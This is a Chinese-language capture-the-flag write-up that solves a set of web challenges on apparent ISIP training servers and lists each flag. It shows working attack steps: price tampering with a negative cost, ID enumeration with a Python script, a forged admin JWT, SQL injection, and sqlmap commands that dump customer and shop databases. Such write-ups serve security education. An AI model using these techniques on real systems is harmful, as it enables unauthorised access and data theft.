Find GET Method
題目要求你找到header 所以只要用curl去抓就好 輸入curl -i -X HEAD http://isip-ctf.tyc4d.tw:8007/ 
FLAG:
FLAG{Now_u_k0nw_g3t_method_32rfwk}
Find POST Method
依據提示是request parmater 進到登入頁面隨便填後送出就行 
FLAG:
FLAG{i_f0und_ure_s3cret_post_form_wqd2ed}
Mystery Header ?
題目說到瀏覽器是如何記住你登入過的呢?,那就看看登入的時候會有什麼 有了這個 
FLAG:
Set-Cookie
May I have the free point ?
進入後會看到是沒有連結前往FLAG購買的 
那就看url的大概規則,是在買喀Point的前一個,所以就是在5431-1的地方 確實冒出來了 
FLAG:
FLAG{BrokenAccessControl_STEP1_Parameter_e32dwqd}
Free point for me ?
接著上題,會發現自己的錢不夠買,中途攔下後修改扣除的金額 
把cost改成負的就可以了 到my order中查看 確實已購買 
FLAG:
FLAG{BrokenAccessControl_STEP2_Parameter_e3dwdwd}
You can’t see me
進入後會看到許多名冊,前往後會被快速切換,用burp suite攔截就好 攔截到其中一頁會發現 
FLAG:
FLAG{You_saw_me_dwqxx!!!}
Where is Edward
在url中發現有很多user以及對應的數字 
我一開始是想要用python去做request然後看返回的是不是有明確的html結構且不是顯示User not found 以下是python腳本
import requests
def scan_links_in_range(start, end): base_url = "http://isip-ctf.tyc4d.tw:8001/user/" for i in range(start, end+1): link = base_url + str(i) response = requests.get(link) if response.status_code == 200: if response.content: print(f"{link}有\n{response.text}") else: print(f"沒找到{link}.")
start = 1end = 10000scan_links_in_range(start, end)突然跳出
說明Edward在1022處
FLAG:
FLAG{My_English_N4m3}
Fix My Blog …
到proxy中的Match and replace rules即可 
出來了 
FLAG:
FLAG{bs_m4tch_and_r391eace}
Website Under Development & Leak Cookie
到登入頁面的html標籤中發現測試帳號僅被註釋掉而已 
登入測試帳號之後我們必須提升到admin才可以 會發現jwt的cookie 
到jwt.io中發現其中的資訊是guest 
在robots.txt中有所需的key 
將其輸入在下方後並將guest修改為admin即可
修改後為eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIn0.H-x71CQ_xp70XDUQPpM7iRo1XDfoH7R3bGOZmQ9941o
取代掉原先cookie的值即可 就進去了 
FLAG:
FLAG{g1t_l3ak_and_cooki3_dewcw}
Welcome2SQL
整個畫面中會發現sql提取的架構 只要將password註釋掉即可 
FLAG:
FLAG{W31c0me_2_SQLi_dqwd2ew}
Dump All Data!
sqlmap -u "http://isip-ctf.tyc4d.tw:8056/index.php" --tables --columns 先用sqlmap搜尋到底有什麼database以及table,卻發現要You are advised to rerun with '--forms --crawl=2' 之後就知道總共有這些了
Database: information_schema[59 tables]+----------------------------------------------------+| CHARACTER_SETS || COLLATIONS || COLLATION_CHARACTER_SET_APPLICABILITY || COLUMN_PRIVILEGES || FILES || GLOBAL_STATUS || GLOBAL_VARIABLES || INNODB_BUFFER_PAGE || INNODB_BUFFER_PAGE_LRU || INNODB_BUFFER_POOL_STATS || INNODB_CMP || INNODB_CMPMEM || INNODB_CMPMEM_RESET || INNODB_CMP_PER_INDEX || INNODB_CMP_PER_INDEX_RESET || INNODB_CMP_RESET || INNODB_FT_BEING_DELETED || INNODB_FT_CONFIG || INNODB_FT_DEFAULT_STOPWORD || INNODB_FT_DELETED || INNODB_FT_INDEX_CACHE || INNODB_FT_INDEX_TABLE || INNODB_LOCKS || INNODB_LOCK_WAITS || INNODB_METRICS || INNODB_SYS_COLUMNS || INNODB_SYS_DATAFILES || INNODB_SYS_FIELDS || INNODB_SYS_FOREIGN || INNODB_SYS_FOREIGN_COLS || INNODB_SYS_INDEXES || INNODB_SYS_TABLES || INNODB_SYS_TABLESPACES || INNODB_SYS_TABLESTATS || INNODB_TRX || KEY_COLUMN_USAGE || OPTIMIZER_TRACE || PARAMETERS || PROFILING || REFERENTIAL_CONSTRAINTS || ROUTINES || SCHEMATA || SCHEMA_PRIVILEGES || SESSION_STATUS || SESSION_VARIABLES || STATISTICS || TABLESPACES || TABLE_CONSTRAINTS || TABLE_PRIVILEGES || USER_PRIVILEGES || VIEWS || COLUMNS || ENGINES || EVENTS || PARTITIONS || PLUGINS || PROCESSLIST || TABLES || TRIGGERS |+----------------------------------------------------+
Database: customer_database[2 tables]+----------------------------------------------------+| flag_table || user_info |+----------------------------------------------------+
Database: mysql[28 tables]+----------------------------------------------------+| event || plugin || user || columns_priv || db || func || general_log || help_category || help_keyword || help_relation || help_topic || innodb_index_stats || innodb_table_stats || ndb_binlog_index || proc || procs_priv || proxies_priv || servers || slave_master_info || slave_relay_log_info || slave_worker_info || slow_log || tables_priv || time_zone || time_zone_leap_second || time_zone_name || time_zone_transition || time_zone_transition_type |+----------------------------------------------------+
Database: performance_schema[52 tables]+----------------------------------------------------+| hosts || accounts || cond_instances || events_stages_current || events_stages_history || events_stages_history_long || events_stages_summary_by_account_by_event_name || events_stages_summary_by_host_by_event_name || events_stages_summary_by_thread_by_event_name || events_stages_summary_by_user_by_event_name || events_stages_summary_global_by_event_name || events_statements_current || events_statements_history || events_statements_history_long || events_statements_summary_by_account_by_event_name || events_statements_summary_by_digest || events_statements_summary_by_host_by_event_name || events_statements_summary_by_thread_by_event_name || events_statements_summary_by_user_by_event_name || events_statements_summary_global_by_event_name || events_waits_current || events_waits_history || events_waits_history_long || events_waits_summary_by_account_by_event_name || events_waits_summary_by_host_by_event_name || events_waits_summary_by_instance || events_waits_summary_by_thread_by_event_name || events_waits_summary_by_user_by_event_name || events_waits_summary_global_by_event_name || file_instances || file_summary_by_event_name || file_summary_by_instance || host_cache || mutex_instances || objects_summary_global_by_type || performance_timers || rwlock_instances || session_account_connect_attrs || session_connect_attrs || setup_actors || setup_consumers || setup_instruments || setup_objects || setup_timers || socket_instances || socket_summary_by_event_name || socket_summary_by_instance || table_io_waits_summary_by_index_usage || table_io_waits_summary_by_table || table_lock_waits_summary_by_table || threads || users |+----------------------------------------------------+
Database: shop_database[1 table]+----------------------------------------------------+| tblproduct |+----------------------------------------------------+而我們要找到客戶的資料,看起來就像在customer_database中的user-info,有了目標就可以用sqlmap繼續了
輸入sqlmap -u "http://isip-ctf.tyc4d.tw:8056/index.php" --forms --crawl=2 --tables -D customer_database --dump -T user-info 發現在765 
FLAG:
FLAG{n0w_y0u_know_sqlmap}
WHERE are you (Shopping Cart)
而我們要尋找架上的東東 看起來就在shop_database中的tblproduct 印出即可sqlmap -u "http://isip-ctf.tyc4d.tw:8056/index.php" --forms --crawl=2 --tables -D shop_database --dump -T tblproduct 這樣子就出來了
FLAG:FLAG{Th3_secret_0f_wh3r3_5tatement}
Infomation_Sc…?
題目都告訴你要在table flag_table中找有幾個varchar類型的 sqlmap -u "http://isip-ctf.tyc4d.tw:8056/index.php" --forms --crawl=2 -D customer_database -T flag_table --columns 會看到共有兩種
FLAG:
2
真實案例挑戰賽Q1
當按下網頁中的連結時,會前往到本機的,我們要把他換掉 
要設定 
然後會看到這個圖 
知道有port:8380 
已經知道帳號是:wordpress 密碼:wordpress_Admin
進去後看到wp_flag的table
FLAG:
FLAG{nice_observation}